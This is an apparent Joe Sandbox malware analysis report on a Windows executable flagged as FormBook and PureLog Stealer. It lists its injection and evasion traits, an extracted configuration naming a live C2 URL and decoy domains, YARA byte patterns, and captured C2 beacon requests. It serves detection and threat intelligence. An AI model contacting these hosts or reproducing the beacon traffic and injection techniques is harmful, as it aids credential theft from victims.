Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xU0wdBC6XWRZ6UY.exe

Overview

General Information

Sample name:xU0wdBC6XWRZ6UY.exe
Analysis ID:1479545
MD5:fab057e49c317d42f565ef0efe766557
SHA1:ebdcbb656a7d0d9ca8c29239a190e1d0265573cd
SHA256:956c41761587ea08a6eb3fca5b047ec8a3145a2d3ced9d8d3967ab351891bad4
Tags:exeFormbook
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xU0wdBC6XWRZ6UY.exe (PID: 1540 cmdline: "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: FAB057E49C317D42F565EF0EFE766557)
    • xU0wdBC6XWRZ6UY.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: FAB057E49C317D42F565EF0EFE766557)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmmon32.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
          • cmd.exe (PID: 3840 cmdline: /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.33pgaaa.com/ps15/"], "decoy": ["57797.asia", "jhpwt.net", "basketballdrillsforkids.com", "zgzf6.rest", "casinomaxnodepositbonus.icu", "uptocryptonews.com", "gomenasorry.com", "fortanix.space", "stripscity.xyz", "genbotdiy.xyz", "mayson-wedding.com", "neb-hub.net", "seancollinsmusic.com", "migraine-treatment-57211.bond", "prosperawoman.info", "tradefairleads.tech", "xn--yeminlitercme-6ob.com", "xwaveevent.com", "fashiontrendshub.xyz", "window-replacement-80823.bond", "simplesculpt.online", "ellipsive.com", "urbandollsllc.com", "kgwcmx.xyz", "marabudigital.online", "abcblindcompany.com", "seraphmovement.com", "overrideapp.com", "holistichealthviews.com", "lovemyhome.online", "mullermachinery.com", "packsperfeitas.shop", "gmgex1.com", "jlk168.com", "xyz-hd.xyz", "happysmall.online", "phwin777.vip", "market-pam.com", "kling-ai.xyz", "kaidifeiniroo.net", "822963429.xyz", "bet4win99.com", "ryuk-studio.com", "tricianihaonewyork.net", "plasoi.xyz", "mi006.com", "briefout.cloud", "urbangrowcity.fun", "yrund.asia", "morningritualtemplate.com", "eehuvvqj.xyz", "flymgl.com", "ux75.top", "bluemarblen5d.com", "trezorsuite.net", "thepeacedealers.com", "harlemshake-burgers.com", "thesvacha.com", "usdj.xyz", "stdaev.com", "your-coffee-to-talk.com", "passrmale.com", "resmierabaru20.shop", "window-replacement-22581.bond"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 26 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                Click to see the 9 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-23T18:28:45.882006+0200
                SID:2031412
                Source Port:53902
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:31:48.971715+0200
                SID:2031412
                Source Port:53909
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:32:14.054099+0200
                SID:2031412
                Source Port:53910
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:29:46.592917+0200
                SID:2031412
                Source Port:53904
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:29:06.265172+0200
                SID:2031412
                Source Port:53903
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:32:32.849943+0200
                SID:2031412
                Source Port:53911
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:30:06.593953+0200
                SID:2031412
                Source Port:53905
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:31:28.381840+0200
                SID:2031412
                Source Port:53908
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:30:47.257969+0200
                SID:2031412
                Source Port:53907
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T18:30:26.792714+0200
                SID:2031412
                Source Port:53906
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.33pgaaa.com/ps15/"], "decoy": ["57797.asia", "jhpwt.net", "basketballdrillsforkids.com", "zgzf6.rest", "casinomaxnodepositbonus.icu", "uptocryptonews.com", "gomenasorry.com", "fortanix.space", "stripscity.xyz", "genbotdiy.xyz", "mayson-wedding.com", "neb-hub.net", "seancollinsmusic.com", "migraine-treatment-57211.bond", "prosperawoman.info", "tradefairleads.tech", "xn--yeminlitercme-6ob.com", "xwaveevent.com", "fashiontrendshub.xyz", "window-replacement-80823.bond", "simplesculpt.online", "ellipsive.com", "urbandollsllc.com", "kgwcmx.xyz", "marabudigital.online", "abcblindcompany.com", "seraphmovement.com", "overrideapp.com", "holistichealthviews.com", "lovemyhome.online", "mullermachinery.com", "packsperfeitas.shop", "gmgex1.com", "jlk168.com", "xyz-hd.xyz", "happysmall.online", "phwin777.vip", "market-pam.com", "kling-ai.xyz", "kaidifeiniroo.net", "822963429.xyz", "bet4win99.com", "ryuk-studio.com", "tricianihaonewyork.net", "plasoi.xyz", "mi006.com", "briefout.cloud", "urbangrowcity.fun", "yrund.asia", "morningritualtemplate.com", "eehuvvqj.xyz", "flymgl.com", "ux75.top", "bluemarblen5d.com", "trezorsuite.net", "thepeacedealers.com", "harlemshake-burgers.com", "thesvacha.com", "usdj.xyz", "stdaev.com", "your-coffee-to-talk.com", "passrmale.com", "resmierabaru20.shop", "window-replacement-22581.bond"]}
                Multi AV Scanner detection for submitted file
                Source: xU0wdBC6XWRZ6UY.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: xU0wdBC6XWRZ6UY.exeJoe Sandbox ML: detected
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cmmon32.pdb source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: cmmon32.pdbGCTL source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xU0wdBC6XWRZ6UY.exe, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 4x nop then pop ebx11_2_00407A10
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 4x nop then pop ebx11_2_00407ADD
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx14_2_02C97ADD
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx14_2_02C97A10

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 172.96.187.60 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: www.33pgaaa.com/ps15/
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== HTTP/1.1Host: www.resmierabaru20.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.thepeacedealers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.33pgaaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== HTTP/1.1Host: www.ellipsive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.mayson-wedding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== HTTP/1.1Host: www.gmgex1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.kaidifeiniroo.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
                Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
                Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
                Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
                Source: Joe Sandbox ViewASN Name: SQUARESPACEUS SQUARESPACEUS
                Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\explorer.exeCode function: 12_2_0869EF82 getaddrinfo,setsockopt,recv,12_2_0869EF82
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== HTTP/1.1Host: www.resmierabaru20.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.thepeacedealers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.33pgaaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== HTTP/1.1Host: www.ellipsive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.mayson-wedding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== HTTP/1.1Host: www.gmgex1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 HTTP/1.1Host: www.kaidifeiniroo.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficDNS traffic detected: DNS query: www.resmierabaru20.shop
                Source: global trafficDNS traffic detected: DNS query: www.thepeacedealers.com
                Source: global trafficDNS traffic detected: DNS query: www.casinomaxnodepositbonus.icu
                Source: global trafficDNS traffic detected: DNS query: www.33pgaaa.com
                Source: global trafficDNS traffic detected: DNS query: www.ellipsive.com
                Source: global trafficDNS traffic detected: DNS query: www.mayson-wedding.com
                Source: global trafficDNS traffic detected: DNS query: www.gmgex1.com
                Source: global trafficDNS traffic detected: DNS query: www.passrmale.com
                Source: global trafficDNS traffic detected: DNS query: www.trezorsuite.net
                Source: global trafficDNS traffic detected: DNS query: www.gomenasorry.com
                Source: global trafficDNS traffic detected: DNS query: www.briefout.cloud
                Source: global trafficDNS traffic detected: DNS query: www.kaidifeiniroo.net
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 23 Jul 2024 16:32:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 23 Jul 2024 16:32:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTvpXyb%2BSeOxPw0qfZqdVYrhk0bD8wHuyWRKMZvHGN7KkyFmSadcxRdgYjPjnnCfXy%2B9e8gLGunCJMD6HNGJzbKrGOicX%2B1iqkuqf7J4E7MU4VSlLXYVUqIpSdRAzvvVCLYZxo4FyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=13.000011X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8a7d112cc8f47c90-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</ti
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738068248.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275745871.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 0000000C.00000000.1311534834.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1311557126.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738832346.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
